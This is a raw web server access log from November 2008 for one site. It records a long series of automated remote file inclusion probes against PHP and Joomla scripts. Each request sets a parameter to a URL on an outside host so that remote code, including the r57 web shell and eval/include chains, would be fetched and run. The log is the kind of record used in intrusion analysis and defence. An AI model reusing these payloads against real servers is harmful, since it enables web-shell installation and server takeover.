200.27.114.10 - - [29/Nov/2008:08:50:45 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:50:46 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94834 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:50:56 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:50:56 -0800] "GET /logs/access_080801.log/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:50:56 -0800] "GET /logs/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:50:57 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:50:57 -0800] "GET /index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 200 94702 "-" "libwww-perl/5.79" "www.dmulk.com"
80.241.163.249 - - [29/Nov/2008:08:51:01 -0800] "GET /logs/access_080714.log%20/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:08 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:08 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:10 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:10 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:51:13 -0800] "GET /logs/access_080523.log/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:51:14 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:51:15 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.60.72 - - [29/Nov/2008:08:51:17 -0800] "GET /logs/access_080912.log/index.php?lg=http://www.nord-radio.com//votingpoll/sex.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:51:17 -0800] "GET /logs/access_080525.log/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:51:29 -0800] "GET /logs/access_080801.log/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:35 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:35 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:35 -0800] "GET /logs/access_081010.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:51:36 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:51:43 -0800] "GET /logs/access_080525.log/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:51:43 -0800] "GET /logs/access_080521.log/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:45 -0800] "GET /logs/access_081010.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:45 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:45 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:45 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:47 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:47 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:47 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:51:47 -0800] "GET /logs/access_081010.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:08:51:48 -0800] "GET /logs/access_080714.log%20/index.php?option=http://www.leegolf.com/vboard/v6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:00 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:00 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:52:00 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:52:01 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:07 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:07 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:08 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:08 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:08 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:08 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:52:12 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:52:14 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:52:22 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:52:22 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:52:23 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:08:52:24 -0800] "GET /logs/access_081008.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:08:52:24 -0800] "GET /errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:08:52:25 -0800] "GET /logs/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:52:27 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:52:43 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:53 -0800] "GET /logs/access_081030.log%20//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.248.45.60 - - [29/Nov/2008:08:52:55 -0800] "GET /logs/access_081030.log%20//_blogadata/include/struct_admin.php?incl_page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:08:52:57 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94834 "-" "libwww-perl/5.79" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:53:04 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:53:13 -0800] "GET /logs/access_081030.log%20//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:53:24 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:53:24 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:53:35 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:53:43 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:53:43 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:53:44 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:53:49 -0800] "GET /logs/access_081030.log%20//_blogadata/include/struct_admin.php?incl_page=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:53:51 -0800] "GET /logs/access_080705.log//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:53:52 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:53:52 -0800] "GET /logs//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:53:53 -0800] "GET /logs/access_080406.log//_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:53:54 -0800] "GET /_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:53:54 -0800] "GET /logs//_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:08:53:59 -0800] "GET /signup//announcements.php?phpraid_dir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:54:02 -0800] "GET /logs/access_080928.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:54:03 -0800] "GET /logs/access_080219.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:54:04 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:54:04 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:54:07 -0800] "GET /signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:54:07 -0800] "GET /logs//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:54:07 -0800] "GET /logs/access_080717.log//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:08:54:11 -0800] "GET /signup//announcements.php?phpraid_dir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:54:11 -0800] "GET /logs/access_080224.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:08:54:16 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:08:54:16 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.75.68.8 - - [29/Nov/2008:08:54:17 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:54:20 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:54:20 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:54:21 -0800] "GET /logs/access_080914.log//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:08:54:38 -0800] "GET /logs/access_081008.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:08:54:39 -0800] "GET /errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:08:54:39 -0800] "GET /logs/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:08:54:41 -0800] "GET /logs/access_080903.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:08:54:42 -0800] "GET /logs/access_080408.log/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:08:54:42 -0800] "GET /errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:08:54:42 -0800] "GET /logs/errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:54:46 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:54:56 -0800] "GET /logs/access_080722.log//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [29/Nov/2008:08:54:57 -0800] "GET /logs/access_080829.log//_blogadata/include/struct_admin.php?incl_page=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:55:01 -0800] "GET /logs/access_080525.log/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:55:06 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:16 -0800] "GET /logs/access_080717.log//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:16 -0800] "GET /logs//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:16 -0800] "GET /signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:17 -0800] "GET /logs/access_080717.log//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:17 -0800] "GET /logs//signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:17 -0800] "GET /signup//announcements.php?phpraid_dir=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.85.234 - - [29/Nov/2008:08:55:17 -0800] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.92.85.234 - - [29/Nov/2008:08:55:17 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:55:39 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:55:39 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:44 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:44 -0800] "GET /logs/access_081007.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:45 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:55:47 -0800] "GET /logs/access_081010.log//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:55:53 -0800] "GET /logs/access_080223.log/?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:55:59 -0800] "GET /logs//include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:08:56:00 -0800] "GET /include/write.php?dir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:56:00 -0800] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:08:56:00 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
